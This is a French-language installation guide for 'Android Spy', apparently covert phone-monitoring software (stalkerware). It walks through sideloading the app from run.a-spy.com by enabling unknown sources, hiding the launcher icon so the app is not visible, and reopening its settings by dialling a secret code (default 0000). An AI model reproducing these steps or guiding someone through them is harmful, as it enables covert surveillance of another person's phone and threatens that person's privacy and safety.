Instruction pour installer Android Spy

1. Démarrez le navigateur Internet sur le périphérique.
2. Accéder à l'URL https://run.a-spy.com.
3. S'il vous plaît entrez l'adresse e-mail et mot de passe du compte que vous avez créé sur https://run.a-spy.com. Tapez sur «Connexion».
4. Appuyez sur «Navigation». Si vous avez un affichage plus grand, passez à l'étape suivante.
5. Appuyez sur «Télécharger».
6. Appuyez sur «Télécharger» et téléchargez l'application.
7. Ouvrez le champ de notification et tapez sur le téléchargement terminé.
8. Appuyez sur «Paramètres».
9. Appuyez sur «Sources inconnues».
10. Appuyez sur «OK».
11. Appuyez sur «Suivant».
12. Appuyez sur «Installer».
13. Appuyez sur «Ouvrir».
14. Appuyez sur «J'accepte».
15. S'il vous plaît entrez l'adresse e-mail et mot de passe du compte que vous avez créé sur https://run.a-spy.com. Appuyez sur «OK».
16. Appuyez sur «OK».
17. Vous pouvez maintenant masquer l'icône dans le lanceur.
18. Appuyez sur «Fermer», si vous ne voulez pas faire des changements dans les paramètres.
19. Pour rouvrir les paramètres, démarrez l'application du téléphone.
20. Entrez le numéro de téléphone qui a été réglé dans les paramètres et appuyez sur «Appeler». Le numéro de téléphone est préréglé: 0000. Si vous ne vous souvenez pas de ce numéro de téléphone, vous les trouverez sur https://run.a-spy.com sous «Périphériques».